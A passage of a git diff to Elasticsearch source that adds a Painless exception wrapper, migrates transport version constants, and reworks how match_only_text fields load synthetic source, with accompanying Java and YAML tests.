} ) -public class ReloadingDatabasesWhilePerformingGeoLookupsIT extends ESTestCase { +public class ReloadingDatabasesWhilePerformingGeoLookupsTests extends ESTestCase { /** * This test essentially verifies that a Maxmind database reader doesn't fail with: diff --git a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java index 6a418d2265a48..2c94f1d58f4b3 100644 --- a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java +++ b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/MultiSearchTemplateIT.java @@ -9,7 +9,7 @@ package org.elasticsearch.script.mustache; -import org.elasticsearch.TransportVersions; +import org.elasticsearch.TransportVersion; import org.elasticsearch.action.index.IndexRequestBuilder; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.common.Strings; @@ -210,7 +210,7 @@ public void testCCSCheckCompatibility() throws Exception { "[fail_before_current_version] was released first in version %s, failed compatibility " + "check trying to send it to node with version %s", FailBeforeCurrentVersionQueryBuilder.FUTURE_VERSION.toReleaseVersion(), - TransportVersions.MINIMUM_CCS_VERSION.toReleaseVersion() + TransportVersion.minimumCCSVersion().toReleaseVersion() ); String actualCause = ex.getCause().getMessage(); assertEquals(expectedCause, actualCause); diff --git a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java index cc0b0122e9cce..1ef8fdb1484dd 100644 --- a/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java +++ b/modules/lang-mustache/src/internalClusterTest/java/org/elasticsearch/script/mustache/SearchTemplateIT.java @@ -426,7 +426,7 @@ public void testIndexedTemplateWithArray() { /** * Test that triggering the CCS compatibility check with a query that shouldn't go to the minor before - * TransportVersions.MINIMUM_CCS_VERSION works + * TransportVersion.minimumCCSVersion() works */ public void testCCSCheckCompatibility() throws Exception { String templateString = """ diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java index 8d0b79fe268a6..990dad06ae110 100644 --- a/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/DefBootstrap.java @@ -201,7 +201,10 @@ protected MethodHandle computeValue(Class<?> receiverType) { try { return lookup(flavor, name, receiverType).asType(type); } catch (Throwable t) { - Def.rethrow(t); + // ClassValue.getFromHashMap wraps checked exceptions as Error, so we + // use a sentinel class [PainlessWrappedException] here to work around + // this issue and later unwrap the original exception + Def.rethrow(t instanceof Exception ? 
new PainlessWrappedException((Exception) t) : t); throw new AssertionError(); } } diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java index d8e6fa62567e5..4806831f2f8c5 100644 --- a/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessScript.java @@ -46,6 +46,9 @@ public interface PainlessScript { * @return The generated ScriptException. */ default ScriptException convertToScriptException(Throwable t, Map<String, List<String>> extraMetadata) { + if (t instanceof PainlessWrappedException) { + t = t.getCause(); + } // create a script stack: this is just the script portion List<String> scriptStack = new ArrayList<>(); ScriptException.Position pos = null; diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessWrappedException.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessWrappedException.java new file mode 100644 index 0000000000000..68d95c286812f --- /dev/null +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/PainlessWrappedException.java @@ -0,0 +1,26 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.painless; + +/** + * Checked exceptions thrown inside {@link ClassValue}#getFromHashMap are wrapped in an {@link Error}, + * which leads to unexpected behavior in Painless. This class is used as a + * workaround for that exception wrapping. + */ +public class PainlessWrappedException extends Error { + + /** + * Constructor. + * @param cause The {@link Exception} cause. + */ + public PainlessWrappedException(final Exception cause) { + super(cause); + } +}
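PainlessWrappedException is an instance of a general trick: tunneling a checked exception through a layer that mangles or forbids checked exceptions, then restoring the original cause at the boundary (here, in convertToScriptException). A rough sketch of that pattern under assumed names; Tunnel, frameworkCallback, and parse are illustrative, not the Painless classes:

// Sentinel Error used only to carry a checked exception through hostile layers.
final class Tunnel extends Error {
    Tunnel(Exception cause) {
        super(cause);
    }
}

final class TunnelDemo {
    // Stand-in for a callback (like ClassValue.computeValue) that must not surface checked exceptions.
    static int frameworkCallback(String input) {
        try {
            return parse(input);
        } catch (Exception e) {
            throw new Tunnel(e); // Errors pass through untouched
        }
    }

    static int parse(String input) throws Exception {
        if (input.isEmpty()) {
            throw new Exception("empty input");
        }
        return Integer.parseInt(input);
    }

    public static void main(String[] args) {
        try {
            frameworkCallback("");
        } catch (Tunnel t) {
            System.out.println("unwrapped: " + t.getCause().getMessage()); // unwrapped: empty input
        }
    }
}

The key property is that the wrapper extends Error, so intermediate machinery that special-cases checked exceptions leaves it alone; the one place that knows about the sentinel unwraps it.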
diff --git a/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java b/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java index 72ecf1fe850ec..02e7774075e55 100644 --- a/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java +++ b/modules/lang-painless/src/main/java/org/elasticsearch/painless/phase/PainlessUserTreeToIRTreePhase.java @@ -12,6 +12,7 @@ import org.elasticsearch.painless.Location; import org.elasticsearch.painless.PainlessError; import org.elasticsearch.painless.PainlessExplainError; +import org.elasticsearch.painless.PainlessWrappedException; import org.elasticsearch.painless.ScriptClassInfo; import org.elasticsearch.painless.ScriptClassInfo.MethodArgument; import org.elasticsearch.painless.ir.BinaryImplNode; @@ -415,6 +416,7 @@ protected static void injectSandboxExceptions(FunctionNode irFunctionNode) { for (Class<?> throwable : List.of( PainlessError.class, + PainlessWrappedException.class, LinkageError.class, OutOfMemoryError.class, StackOverflowError.class, diff --git a/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java b/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java index b22329b8d6bfb..dca2350482616 100644 --- a/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java +++ b/modules/lang-painless/src/test/java/org/elasticsearch/painless/DefBootstrapTests.java @@ -139,9 +139,11 @@ public void testMegamorphic() throws Throwable { map.put("a", "b"); assertEquals(2, (int) handle.invokeExact((Object) map)); - final IllegalArgumentException iae = expectThrows(IllegalArgumentException.class, () -> { + final PainlessWrappedException pwe = expectThrows(PainlessWrappedException.class, () -> { Integer.toString((int) handle.invokeExact(new Object())); }); + assertTrue(pwe.getCause() instanceof IllegalArgumentException); + IllegalArgumentException iae = (IllegalArgumentException) pwe.getCause(); assertEquals("dynamic method [java.lang.Object, size/0] not found", iae.getMessage()); assertTrue("Does not fail inside ClassValue.computeValue()", Arrays.stream(iae.getStackTrace()).anyMatch(e -> { return e.getMethodName().equals("computeValue") && e.getClassName().startsWith("org.elasticsearch.painless.DefBootstrap$PIC$");
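For context on why DefBootstrap is entangled with ClassValue at all: a ClassValue computes and caches one value per receiver class, which is what makes it a good fit for a per-class method-handle cache, and it is also the layer whose exception handling motivates the wrapping exercised in the test above. A small stand-alone illustration using only the JDK API (simplified far beyond the real DefBootstrap$PIC):

final class PerClassCache {
    static final ClassValue<String> SIMPLE_NAMES = new ClassValue<>() {
        @Override
        protected String computeValue(Class<?> type) {
            // In DefBootstrap this is where the MethodHandle lookup happens,
            // and where lookup failures originate.
            return type.getSimpleName();
        }
    };

    public static void main(String[] args) {
        System.out.println(SIMPLE_NAMES.get(String.class));  // "String": computed once, then cached per class
        System.out.println(SIMPLE_NAMES.get(Integer.class)); // "Integer"
    }
}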
diff --git a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java index 61abda3aeb16e..faea13dac4e31 100644 --- a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java +++ b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapper.java @@ -34,19 +34,21 @@ import org.elasticsearch.common.text.UTF8DecodingReader; import org.elasticsearch.common.unit.Fuzziness; import org.elasticsearch.index.IndexVersion; +import org.elasticsearch.index.IndexVersions; import org.elasticsearch.index.analysis.IndexAnalyzers; import org.elasticsearch.index.analysis.NamedAnalyzer; import org.elasticsearch.index.fielddata.FieldDataContext; import org.elasticsearch.index.fielddata.IndexFieldData; import org.elasticsearch.index.fielddata.SourceValueFetcherSortedBinaryIndexFieldData; import org.elasticsearch.index.fielddata.StoredFieldSortedBinaryIndexFieldData; -import org.elasticsearch.index.fieldvisitor.LeafStoredFieldLoader; import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; import org.elasticsearch.index.mapper.BlockLoader; import org.elasticsearch.index.mapper.BlockSourceReader; import org.elasticsearch.index.mapper.BlockStoredFieldsReader; import org.elasticsearch.index.mapper.DocumentParserContext; import org.elasticsearch.index.mapper.FieldMapper; +import org.elasticsearch.index.mapper.KeywordFieldMapper; +import org.elasticsearch.index.mapper.MappedFieldType; import org.elasticsearch.index.mapper.MapperBuilderContext; import org.elasticsearch.index.mapper.SourceValueFetcher; import org.elasticsearch.index.mapper.StringFieldType; @@ -105,8 +107,15 @@ public static class Builder extends FieldMapper.Builder { private final TextParams.Analyzers analyzers; private final boolean withinMultiField; + private final boolean storedFieldInBinaryFormat; - public Builder(String name, IndexVersion indexCreatedVersion, IndexAnalyzers indexAnalyzers, boolean withinMultiField) { + public Builder( + String name, + IndexVersion indexCreatedVersion, + IndexAnalyzers indexAnalyzers, + boolean withinMultiField, + boolean storedFieldInBinaryFormat + ) { super(name); this.indexCreatedVersion = indexCreatedVersion; this.analyzers = new TextParams.Analyzers( @@ -116,6 +125,7 @@ public Builder(String name, IndexVersion indexCreatedVersion, IndexAnalyzers ind indexCreatedVersion ); this.withinMultiField = withinMultiField; + this.storedFieldInBinaryFormat = storedFieldInBinaryFormat; } @Override @@ -133,7 +143,10 @@ private MatchOnlyTextFieldType buildFieldType(MapperBuilderContext context) { tsi, indexAnalyzer, context.isSourceSynthetic(), - meta.getValue() + meta.getValue(), + withinMultiField, + multiFieldsBuilder.hasSyntheticSourceCompatibleKeywordField(), + storedFieldInBinaryFormat ); return ft; } @@ -153,8 +166,22 @@ public MatchOnlyTextFieldMapper build(MapperBuilderContext context) { } } + private static boolean isSyntheticSourceStoredFieldInBinaryFormat(IndexVersion indexCreatedVersion) { + return indexCreatedVersion.onOrAfter(IndexVersions.MATCH_ONLY_TEXT_STORED_AS_BYTES) + || indexCreatedVersion.between( + IndexVersions.MATCH_ONLY_TEXT_STORED_AS_BYTES_BACKPORT_8_X, + IndexVersions.UPGRADE_TO_LUCENE_10_0_0 + ); + } + public static final TypeParser PARSER = new TypeParser( - (n, c) -> new Builder(n, c.indexVersionCreated(), c.getIndexAnalyzers(), c.isWithinMultiField()) + (n, c) -> new Builder( + n, + c.indexVersionCreated(), + c.getIndexAnalyzers(), + c.isWithinMultiField(), + isSyntheticSourceStoredFieldInBinaryFormat(c.indexVersionCreated()) + ) ); public static class MatchOnlyTextFieldType extends StringFieldType { @@ -163,17 +190,27 @@ public static class MatchOnlyTextFieldType extends StringFieldType { private final TextFieldType textFieldType; private final String originalName; + private final boolean withinMultiField; + private final boolean hasCompatibleMultiFields; + private final boolean storedFieldInBinaryFormat; + public MatchOnlyTextFieldType( String name, TextSearchInfo tsi, Analyzer indexAnalyzer, boolean isSyntheticSource, - Map<String, Object> meta + Map<String, Object> meta, + boolean withinMultiField, + boolean hasCompatibleMultiFields, + boolean storedFieldInBinaryFormat ) { super(name, true, false, false, tsi, meta); this.indexAnalyzer = Objects.requireNonNull(indexAnalyzer); this.textFieldType = new TextFieldType(name, isSyntheticSource); this.originalName = isSyntheticSource ? 
name + "._original" : null; + this.withinMultiField = withinMultiField; + this.hasCompatibleMultiFields = hasCompatibleMultiFields; + this.storedFieldInBinaryFormat = storedFieldInBinaryFormat; } public MatchOnlyTextFieldType(String name) { @@ -182,7 +219,10 @@ public MatchOnlyTextFieldType(String name) { new TextSearchInfo(Defaults.FIELD_TYPE, null, Lucene.STANDARD_ANALYZER, Lucene.STANDARD_ANALYZER), Lucene.STANDARD_ANALYZER, false, - Collections.emptyMap() + Collections.emptyMap(), + false, + false, + false ); } @@ -209,16 +249,58 @@ private IOFunction, IOExcepti "Field [" + name() + "] of type [" + CONTENT_TYPE + "] cannot run positional queries since [_source] is disabled." ); } - if (searchExecutionContext.isSourceSynthetic()) { + if (searchExecutionContext.isSourceSynthetic() && withinMultiField) { + String parentField = searchExecutionContext.parentPath(name()); + var parent = searchExecutionContext.lookup().fieldType(parentField); + + if (parent instanceof KeywordFieldMapper.KeywordFieldType keywordParent + && keywordParent.ignoreAbove() != Integer.MAX_VALUE) { + if (parent.isStored()) { + return storedFieldFetcher(parentField, keywordParent.originalName()); + } else if (parent.hasDocValues()) { + var ifd = searchExecutionContext.getForField(parent, MappedFieldType.FielddataOperation.SEARCH); + return combineFieldFetchers(docValuesFieldFetcher(ifd), storedFieldFetcher(keywordParent.originalName())); + } + } + + if (parent.isStored()) { + return storedFieldFetcher(parentField); + } else if (parent.hasDocValues()) { + var ifd = searchExecutionContext.getForField(parent, MappedFieldType.FielddataOperation.SEARCH); + return docValuesFieldFetcher(ifd); + } else { + assert false : "parent field should either be stored or have doc values"; + } + } else if (searchExecutionContext.isSourceSynthetic() && hasCompatibleMultiFields) { + var mapper = (MatchOnlyTextFieldMapper) searchExecutionContext.getMappingLookup().getMapper(name()); + var kwd = TextFieldMapper.SyntheticSourceHelper.getKeywordFieldMapperForSyntheticSource(mapper); + + if (kwd != null) { + var fieldType = kwd.fieldType(); + + if (fieldType.ignoreAbove() != Integer.MAX_VALUE) { + if (fieldType.isStored()) { + return storedFieldFetcher(fieldType.name(), fieldType.originalName()); + } else if (fieldType.hasDocValues()) { + var ifd = searchExecutionContext.getForField(fieldType, MappedFieldType.FielddataOperation.SEARCH); + return combineFieldFetchers(docValuesFieldFetcher(ifd), storedFieldFetcher(fieldType.originalName())); + } + } + + if (fieldType.isStored()) { + return storedFieldFetcher(fieldType.name()); + } else if (fieldType.hasDocValues()) { + var ifd = searchExecutionContext.getForField(fieldType, MappedFieldType.FielddataOperation.SEARCH); + return docValuesFieldFetcher(ifd); + } else { + assert false : "multi field should either be stored or have doc values"; + } + } else { + assert false : "multi field of type keyword should exist"; + } + } else if (searchExecutionContext.isSourceSynthetic()) { String name = storedFieldNameForSyntheticSource(); - StoredFieldLoader loader = StoredFieldLoader.create(false, Set.of(name)); - return context -> { - LeafStoredFieldLoader leafLoader = loader.getLoader(context, null); - return docId -> { - leafLoader.advanceTo(docId); - return leafLoader.storedFields().get(name); - }; - }; + return storedFieldFetcher(name); } return context -> { ValueFetcher valueFetcher = valueFetcher(searchExecutionContext, null); @@ -234,6 +316,75 @@ private IOFunction, IOExcepti }; } + private static 
+ private static IOFunction<LeafReaderContext, CheckedIntFunction<List<Object>, IOException>> docValuesFieldFetcher( + IndexFieldData<?> ifd + ) { + return context -> { + var sortedBinaryDocValues = ifd.load(context).getBytesValues(); + return docId -> { + if (sortedBinaryDocValues.advanceExact(docId)) { + var values = new ArrayList<>(sortedBinaryDocValues.docValueCount()); + for (int i = 0; i < sortedBinaryDocValues.docValueCount(); i++) { + values.add(sortedBinaryDocValues.nextValue().utf8ToString()); + } + return values; + } else { + return List.of(); + } + }; + }; + } + + private static IOFunction<LeafReaderContext, CheckedIntFunction<List<Object>, IOException>> storedFieldFetcher(String... names) { + var loader = StoredFieldLoader.create(false, Set.of(names)); + return context -> { + var leafLoader = loader.getLoader(context, null); + return docId -> { + leafLoader.advanceTo(docId); + var storedFields = leafLoader.storedFields(); + if (names.length == 1) { + return storedFields.get(names[0]); + } + + List<Object> values = new ArrayList<>(); + for (var name : names) { + var currValues = storedFields.get(name); + if (currValues != null) { + values.addAll(currValues); + } + } + + return values; + }; + }; + } + + private static IOFunction<LeafReaderContext, CheckedIntFunction<List<Object>, IOException>> combineFieldFetchers( + IOFunction<LeafReaderContext, CheckedIntFunction<List<Object>, IOException>> primaryFetcher, + IOFunction<LeafReaderContext, CheckedIntFunction<List<Object>, IOException>> secondaryFetcher + ) { + return context -> { + var primaryGetter = primaryFetcher.apply(context); + var secondaryGetter = secondaryFetcher.apply(context); + return docId -> { + List<Object> values = new ArrayList<>(); + var primary = primaryGetter.apply(docId); + if (primary != null) { + values.addAll(primary); + } + + var secondary = secondaryGetter.apply(docId); + if (secondary != null) { + values.addAll(secondary); + } + + assert primary != null || secondary != null; + + return values; + }; + }; + } + private Query toQuery(Query query, SearchExecutionContext searchExecutionContext) { return new ConstantScoreQuery( new SourceConfirmedTextQuery(query, getValueFetcherProvider(searchExecutionContext), indexAnalyzer) @@ -362,10 +513,42 @@ public Query phrasePrefixQuery(TokenStream stream, int slop, int maxExpansions, return toQuery(query, queryShardContext); } + private static class BytesFromMixedStringsBytesRefBlockLoader extends BlockStoredFieldsReader.StoredFieldsBlockLoader { + BytesFromMixedStringsBytesRefBlockLoader(String field) { + super(field); + } + + @Override + public Builder builder(BlockFactory factory, int expectedCount) { + return factory.bytesRefs(expectedCount); + } + + @Override + public RowStrideReader rowStrideReader(LeafReaderContext context) throws IOException { + return new BlockStoredFieldsReader.Bytes(field) { + private final BytesRef scratch = new BytesRef(); + + @Override + protected BytesRef toBytesRef(Object v) { + if (v instanceof BytesRef b) { + return b; + } else { + assert v instanceof String; + return BlockSourceReader.toBytesRef(scratch, v.toString()); + } + } + }; + } + } + @Override public BlockLoader blockLoader(BlockLoaderContext blContext) { if (textFieldType.isSyntheticSource()) { - return new BlockStoredFieldsReader.BytesFromBytesRefsBlockLoader(storedFieldNameForSyntheticSource()); + if (storedFieldInBinaryFormat) { + return new BlockStoredFieldsReader.BytesFromBytesRefsBlockLoader(storedFieldNameForSyntheticSource()); + } else { + return new BytesFromMixedStringsBytesRefBlockLoader(storedFieldNameForSyntheticSource()); + } }
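The BytesFromMixedStringsBytesRefBlockLoader above and the storedToBytesRef override just below exist for the same reason: depending on the index version that wrote the segment, the synthetic-source copy of a match_only_text field may be stored as a String or as a BytesRef, so every reader has to normalize both shapes. A tiny sketch of that normalization in isolation (StoredValueNormalizer is an illustrative name, not ES code; only Lucene's BytesRef is assumed):

import org.apache.lucene.util.BytesRef;

final class StoredValueNormalizer {
    // Accepts either representation of the stored synthetic-source value and returns the binary form.
    static BytesRef normalize(Object stored) {
        if (stored instanceof BytesRef bytes) {
            return bytes; // binary format, written by newer indices
        }
        assert stored instanceof String;
        return new BytesRef((String) stored); // string format, written by older indices
    }
}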
SourceValueFetcher fetcher = SourceValueFetcher.toString(blContext.sourcePaths(name())); // MatchOnlyText never has norms, so we have to use the field names field @@ -386,7 +569,12 @@ public IndexFieldData.Builder fielddataBuilder(FieldDataContext fieldDataContext ) { @Override protected BytesRef storedToBytesRef(Object stored) { - return (BytesRef) stored; + if (stored instanceof BytesRef storedBytes) { + return storedBytes; + } else { + assert stored instanceof String; + return new BytesRef(stored.toString()); + } } }; } @@ -411,6 +599,7 @@ private String storedFieldNameForSyntheticSource() { private final boolean storeSource; private final FieldType fieldType; private final boolean withinMultiField; + private final boolean storedFieldInBinaryFormat; private MatchOnlyTextFieldMapper( String simpleName, @@ -430,6 +619,7 @@ private MatchOnlyTextFieldMapper( this.positionIncrementGap = builder.analyzers.positionIncrementGap.getValue(); this.storeSource = storeSource; this.withinMultiField = builder.withinMultiField; + this.storedFieldInBinaryFormat = builder.storedFieldInBinaryFormat; } @Override @@ -439,7 +629,7 @@ public Map<String, NamedAnalyzer> indexAnalyzers() { @Override public FieldMapper.Builder getMergeBuilder() { - return new Builder(leafName(), indexCreatedVersion, indexAnalyzers, withinMultiField).init(this); + return new Builder(leafName(), indexCreatedVersion, indexAnalyzers, withinMultiField, storedFieldInBinaryFormat).init(this); } @Override @@ -456,8 +646,12 @@ protected void parseCreateField(DocumentParserContext context) throws IOExceptio context.addToFieldNames(fieldType().name()); if (storeSource) { - final var bytesRef = new BytesRef(utfBytes.bytes(), utfBytes.offset(), utfBytes.length()); - context.doc().add(new StoredField(fieldType().storedFieldNameForSyntheticSource(), bytesRef)); + if (storedFieldInBinaryFormat) { + final var bytesRef = new BytesRef(utfBytes.bytes(), utfBytes.offset(), utfBytes.length()); + context.doc().add(new StoredField(fieldType().storedFieldNameForSyntheticSource(), bytesRef)); + } else { + context.doc().add(new StoredField(fieldType().storedFieldNameForSyntheticSource(), value.string())); + } } } @@ -473,13 +667,27 @@ public MatchOnlyTextFieldType fieldType() { @Override protected SyntheticSourceSupport syntheticSourceSupport() { - return new SyntheticSourceSupport.Native( - () -> new StringStoredFieldFieldLoader(fieldType().storedFieldNameForSyntheticSource(), fieldType().name(), leafName()) { - @Override - protected void write(XContentBuilder b, Object value) throws IOException { - b.value(((BytesRef) value).utf8ToString()); + if (storeSource) { + return new SyntheticSourceSupport.Native( + () -> new StringStoredFieldFieldLoader(fieldType().storedFieldNameForSyntheticSource(), fieldType().name(), leafName()) { + @Override + protected void write(XContentBuilder b, Object value) throws IOException { + if (value instanceof BytesRef valueBytes) { + b.value(valueBytes.utf8ToString()); + } else { + assert value instanceof String; + b.value(value.toString()); + } + } } + ); + } else { + var kwd = TextFieldMapper.SyntheticSourceHelper.getKeywordFieldMapperForSyntheticSource(this); + if (kwd != null) { + return new SyntheticSourceSupport.Native(() -> kwd.syntheticFieldLoader(fullPath(), leafName())); } - ); + assert false : "there should be a suitable field mapper with native synthetic source support"; + return super.syntheticSourceSupport(); + } } } diff --git a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java index 61b8322e4732d..6ccd52fb78e51 100644 --- 
a/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java +++ b/modules/mapper-extras/src/main/java/org/elasticsearch/index/mapper/extras/RankFeatureQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.mapper.MappedFieldType; @@ -416,6 +415,6 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java b/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java index f427c6c1b7c07..ef72e234f8d6b 100644 --- a/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java +++ b/modules/mapper-extras/src/test/java/org/elasticsearch/index/mapper/extras/MatchOnlyTextFieldMapperTests.java @@ -10,6 +10,9 @@ package org.elasticsearch.index.mapper.extras; import org.apache.lucene.analysis.TokenStream; +import org.apache.lucene.document.Field; +import org.apache.lucene.document.StoredField; +import org.apache.lucene.document.StringField; import org.apache.lucene.index.DirectoryReader; import org.apache.lucene.index.DocValuesType; import org.apache.lucene.index.IndexOptions; @@ -21,9 +24,12 @@ import org.apache.lucene.tests.analysis.CannedTokenStream; import org.apache.lucene.tests.analysis.Token; import org.apache.lucene.tests.index.RandomIndexWriter; +import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.Strings; +import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Tuple; import org.elasticsearch.index.IndexSettings; +import org.elasticsearch.index.IndexVersions; import org.elasticsearch.index.mapper.DocumentMapper; import org.elasticsearch.index.mapper.KeywordFieldMapper; import org.elasticsearch.index.mapper.LuceneDocument; @@ -350,4 +356,33 @@ public void testStoreParameterDefaultsSyntheticSourceTextFieldIsMultiField() thr assertThat(fields, empty()); } } + + public void testLoadSyntheticSourceFromStringOrBytesRef() throws IOException { + var mappings = mapping(b -> { + b.startObject("field1").field("type", "match_only_text").endObject(); + b.startObject("field2").field("type", "match_only_text").endObject(); + }); + var settings = Settings.builder().put("index.mapping.source.mode", "synthetic").build(); + DocumentMapper mapper = createMapperService(IndexVersions.UPGRADE_TO_LUCENE_10_2_2, settings, () -> true, mappings) + .documentMapper(); + + try (Directory directory = newDirectory()) { + RandomIndexWriter iw = indexWriterForSyntheticSource(directory); + + LuceneDocument document = new LuceneDocument(); + document.add(new StringField("field1", "foo", Field.Store.NO)); + document.add(new StoredField("field1._original", "foo")); + + document.add(new StringField("field2", "bar", Field.Store.NO)); + document.add(new StoredField("field2._original", new BytesRef("bar"))); + + iw.addDocument(document); + iw.close(); + + try (DirectoryReader indexReader = wrapInMockESDirectoryReader(DirectoryReader.open(directory))) { + String syntheticSource = syntheticSource(mapper, null, indexReader, 0); + 
assertEquals("{\"field1\":\"foo\",\"field2\":\"bar\"}", syntheticSource); + } + } + } } diff --git a/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml b/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml index 821ab46b1bd64..48a596ef14c72 100644 --- a/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml +++ b/modules/mapper-extras/src/yamlRestTest/resources/rest-api-spec/test/match_only_text/10_basic.yml @@ -394,4 +394,345 @@ synthetic_source with copy_to: - match: hits.hits.0.fields.copy.0: "Apache Lucene powers Elasticsearch" +--- +synthetic_source match_only_text as multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text as multi-field with ignored keyword as parent: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + store: false + doc_values: true + ignore_above: 10 + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: [ "Apache Lucene powers Elasticsearch", "Apache" ] + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: [ "Apache", "Apache Lucene powers Elasticsearch" ] + +--- +synthetic_source match_only_text as multi-field with stored keyword as parent: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + store: true + doc_values: false + fields: + text: + type: match_only_text + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text as multi-field with ignored stored keyword as parent: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: keyword + store: true + doc_values: false + 
